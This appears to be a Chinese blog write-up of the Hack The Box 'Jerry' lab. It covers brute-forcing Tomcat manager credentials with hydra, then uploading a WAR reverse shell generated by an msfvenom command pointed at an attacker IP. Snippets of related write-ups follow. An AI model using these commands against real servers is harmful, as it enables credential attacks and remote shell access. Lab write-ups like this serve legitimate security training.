【Hack The Box】windows练习-- jerry

最新推荐文章于 2025-09-03 23:14:03 发布
原创 最新推荐文章于 2025-09-03 23:14:03 发布 · 282 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#java #tomcat #前端 #Hack The Box #网络安全

这是一篇HTB学习笔记,主要记录了windows练习“jerry”中的信息收集过程。发现开启了tomcat服务,介绍了针对tomcat的信息收集要点,如检查/manager目录及弱口令,通过爆破登陆后台,利用rar反弹shell获取权限,还提到处理带空格文件名的注意事项。

HTB 学习笔记

【Hack The Box】windows练习-- jerry

🔥系列专栏:Hack The Box
🎉欢迎关注🔎点赞👍收藏⭐️留言📝
📆首发时间:🌴2022年10月31日🌴
🍭作者水平很有限,如果发现错误,还望告知,感谢!

文章目录

信息收集

在这里插入图片描述发现开启了tomcat
在这里插入图片描述
首先,关于tomcat,我们要明确两点(第一就是/manager目录,看是否存在,如果存在,是否存在弱口令,弱口令要么去网上找,要么就直接爆破)

在这里插入图片描述
然后就是如果爆破的话,一般在manager后面还会有个html,当你点击取消的时候你就会发现
在这里插入图片描述

hydra -C ./Passwords/Default-Credentials/tomcat-betterdefaultpasslist.txt http-get://10.129.8.70:8080/manager/html

在这里插入图片描述

爆破出来之后先登陆admin的,发现啥都没有,就退回来登陆另一个
发现后台,然后就是常见的rar的反弹shell

在这里插入图片描述

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.6 LPORT=8888 -f war > shell.war

在我们上传之后会自动的跳出文件页面,我们只需要点击一下,就能拿到反弹shell

在这里插入图片描述
然后去桌面找,就能找到,这里注意,带空格的文件名需要引号起来

在这里插入图片描述

hackthebox-Jerry(考点:tomcat安全/windows
冬萍子癸水
04-16 511
nmap 就8080,扫描结果显示是tom猫 网上有很多方法,把tom猫按在地上摩擦。。。这个 先传统方法。进去,上传 dirbuster搜到manager登录页面 不知道密码,那么想法找密码,但是如果此时点了取消登录框cancel,密码就自动出来了。。。。。。。。额 或者kali自带的破解tom的字典,在这里 然后用这个小脚本自动跑 #!/usr/bin/env python impor...
Hackthebox:Jerry Walkthrough(not use metasploit)
汗的博客
12-19 805
Jerry是一个Windows系统的Hackthebox靶机,主要和tomcat有关,本walkthrough未使用msf
[Hack The Box]靶机4 Jerry
Huamang的博客
03-29 585
首先用nmap进行端口扫描,看到只开启了8080端口,是Tomcat 给出的是默认界面 dirmap扫描了一下目录 去manager管理页面看看,他需要认证 他提示密码为s3cret,试了一下真是这个,倒省事了,不用我自己爆破 进tomcat的后台就好弄了哦,getshell方法多的是,这里写的挺多的,这里我选择直接用是msf打,方便点 use exploit/multi/http/tomcat_mgr_upload 直接打通 在Administrator的桌面发现flag cd C:.
Hackthebox------Jerry
大方子
11-24 3161
hackthebox网站:https://www.hackthebox.eu   这次我们的靶机叫-Jerry IP:10.10.10.95   ====================================================================================== 1.先用nmap对 目标靶机进行扫描 nmap -sC -sV...
HackTheBox::Jerry
aya3t的博客
10-12 343
HackTheBox::Jerry
Stego-Challenges-HackTheBox-Write-Ups:Hack The Box带来的Stego挑战| Walkthoughs写ups
03-21
在IT安全领域,尤其是黑客挑战平台如Hack The Box(HTB)中,"Stego"是一种常见的挑战类型,它涉及到隐藏信息的技术,通常被称为隐写术。隐写术是一种利用图像、音频、文本等载体秘密传输信息的方法。在这个特定的...
HackTheBox-CTF-Writeups:此备忘单旨在面向CTF玩家和初学者,以帮助他们根据操作系统和难度对Hack The Box Labs进行分类
05-06
HackTheBox CTF速查表 该备忘单面向CTF玩家和初学者,可帮助他们根据操作系统和难度对Hack The Box Labs进行分类。 此列表包含hackingarticles上所有可用的Hack The Box文章。 我们已经根据我们的经验执行并编制了此...
Hackthebox e Vulnhub - Dicas e Truques.pdf
10-06
在这个领域,两个知名的在线平台是Hackthebox和Vulnhub,它们提供虚拟环境供用户实践和提升渗透测试技能。这份PDF文档作者Joas Antonio分享了一些初学者在接触这些平台时可能会发现有用的技巧和策略。 首先,对于...
Hackthebox靶场---Undetected 攻略实战(难)
weixin_51339377的博客
04-24 4471
正常思路 nmap进行端口扫描 发现开放了80和22端口 网站进入80端口 是一个珠宝网站 发现点击store会重定向到其他的url http://store.djewelry.htb/ 我们首先用dirsearch扫描一下 然而并没有发现什么有用的,也跟基本主界面测试差不多 除了store可能有可以利用的地方 我们不妨把这个未知url的地址也dns解析到这个ip地址 执行以下命令即可 echo 10.10.11.146 djewelry.htb store.dj...
Hack The Box 是一个非常受欢迎的在线平台,主要面向网络安全爱好者、专业渗透测试人员以及希望提升自己在网络安全领域技能
06-22
Hack The Box 是一个非常受欢迎的在线平台,主要面向网络安全爱好者、专业渗透测试人员以及希望提升自己在网络安全领域技能的学生。它提供了一个安全且合法的环境,让参与者能够实践他们的黑客技能,而不必担心法律...
Hack the box靶机 Jerry
菜浪马废的博客
05-27 463
需要账户 ??????? 老子就点了个取消 你把密码都给我了? tomcat:s3cret 登录完还是这个 再找找其他的 /manage可以登录进来 可以上传文件 需要点一下我上传的shell 才能连接 查看有空格的文件名的时候 用“”把文件名括起来就可以查看了 白天不知道因为什么心烦 没怎么学习 随便翻了翻linux的缓冲区 还有一个htb上win的简单的题 还得努力啊 离着月薪三万还差得远呢 加油! ...
hack the box jerry靶机
zr1213159840的博客
04-14 1004
打开靶机,扫一下看看有什么东西。能看到是存在一个8080端口,tomcat,apache等信息 nmap -sV -Pn -A 10.10.10.95 这个机器给了提示,说什么远程命令执行,什么文件上传之类的。我感觉使用msf或许可以。于是打开msf进去搜索了一下。能看到确实有上传相关的漏洞。 search apache tomcat 这下好了,直接利用就好了,哈哈哈哈。 首先配置远程主机为10.10.10.95,配置远程端口为8080,然后直接run!不出意外直接没用,非常尴尬。 接着看了一下漏
No.60-HackTheBox-windows-Jerry-Walkthrough渗透学习
qq_34801745的博客
02-25 378
** HackTheBox-windows-Jerry-Walkthrough ** 靶机地址:https://www.hackthebox.eu/home/machines/profile/144 靶机难度:初级(4.0/10) 靶机发布日期:2018年11月11日 靶机描述: Although Jerry is one of the easier machines on Hack The Bo...
HackTheBox-Lame&Jerry渗透测试
weixin_43111940的博客
04-13 300
Lame 端口扫描 sudo nmap -sC -sV -p 21,22,139,445,3632 10.10.10.3 发现了ftp和smb服务 匿名登录一下ftp 没有什么东西 查找smb服务的exp searchslpoit smb 这里可以用msf打 由于在OSCP的进攻方认证考试中只允许对一台主机用msf,所以在测试的时候尽量避免用msf(直接用msf很low) 用的是distccd的脚本,搜索distccd exploit 找到对应的脚本 https://gist.github.co
jerry yue_如何从hackthebox入侵jerry
weixin_26636643的博客
09-27 722
jerry yue 介绍 (Introduction) Welcome to my third article. Today we will be looking at Jerry from HackTheBox. This is a realistic and very easy box. The article will again be similar to my first and sec...
make 函数概述与内部配置详解
sqym1的博客
09-01 644
函数在切片、映射、通道三种核心引用类型的参数化配置,可以精细控制内存分配策略、并发同步行为以及运行时性能表现。:基于同一底层数组,可通过切分创建多个互不影响数据地址的切片视图。,减少再散列(rehash)次数和链长度,保证查找与插入性能。,但内部 1<<B 个桶已就绪,可高效插入前 16 对映射。标记结束,接收方可读出剩余缓存并返回零值,不再阻塞。,底层按照倍增策略重新分配更大数组,复制旧数据。,并据此分配内部桶(bucket)的数量,,并保证对象已被初始化,直接可用。切片:分配底层数组,并返回对应的。
GDPU操作系统实验:生产者消费者问题
平平无奇的小甜菜
08-31 1277
本文摘要:实验通过信号量机制实现生产者-消费者模型,建立大小为10的缓冲区,使用3个生产者线程随机生成大小写字母,2个消费者线程取出字符。通过empty、full和mutex信号量实现同步与互斥,确保缓冲区访问安全。进阶实验扩展为选择性消费,增加3类消费者(仅小写/仅大写/任意字符),通过额外信号量管理不同类型产品。实验验证了进程同步中共享资源管理的有效性,演示了环形缓冲区和多线程协调的实现方法,为操作系统并发控制提供了实践案例。(149字)
第二章 Windows 核心概念通俗解析
最新发布
YJlio的博客
09-03 906
本文通俗解析了Windows核心概念,帮助理解Sysinternals工具背后的原理。主要内容包括:管理员权限与UAC机制、进程线程与作业的区别、用户模式与内核模式的切换、句柄的作用机制、应用隔离技术(MIC和App Container)、受保护进程特性、调用栈与符号的重要性,以及会话窗口机制和UIPI安全防护。通过生活化比喻和记忆口诀,将复杂的Windows内核原理转化为易于理解的知识点,为使用Sysinternals工具进行系统诊断提供理论基础。掌握这些核心概念能更准确地解读工具数据,快速定位系统问题。
【开题答辩全过程】以 基于SSM的电竞设备商城设计与开发为例,包含答辩的问题和答案
shiji7553的博客
09-03 294
这是一篇关于计算机专业毕业设计答辩的摘要。文中介绍了一位14年经验的资深毕设内行人,擅长Java、PHP、微信小程序、Python、Golang、安卓Android等多种开发语言,项目涉及大数据、深度学习、网站、小程序、安卓系统、算法等。该内行人还提供项目定制开发、代码讲解、答辩教学、文档编写、降重技巧等服务。 在答辩过程中,学生详细介绍了其基于SSM框架开发的电竞设备商城系统,包括用户角色划分、功能模块设计、技术选型依据(Java/SSM/HTML/CSS/MySQL/B-S架构)以及安全措施(MD5加盐
hackthebox - reel
11-03
HackTheBox - Reel是一个在黑客社区非常受欢迎的虚拟机靶场。这个靶场的目标是通过渗透测试和攻击手法,找到并获得系统的管理员权限。靶场基于漏洞存在和网络安全问题,提供了一个真实的环境来练习和提升安全技能。 ...
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

人间体佐菲

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值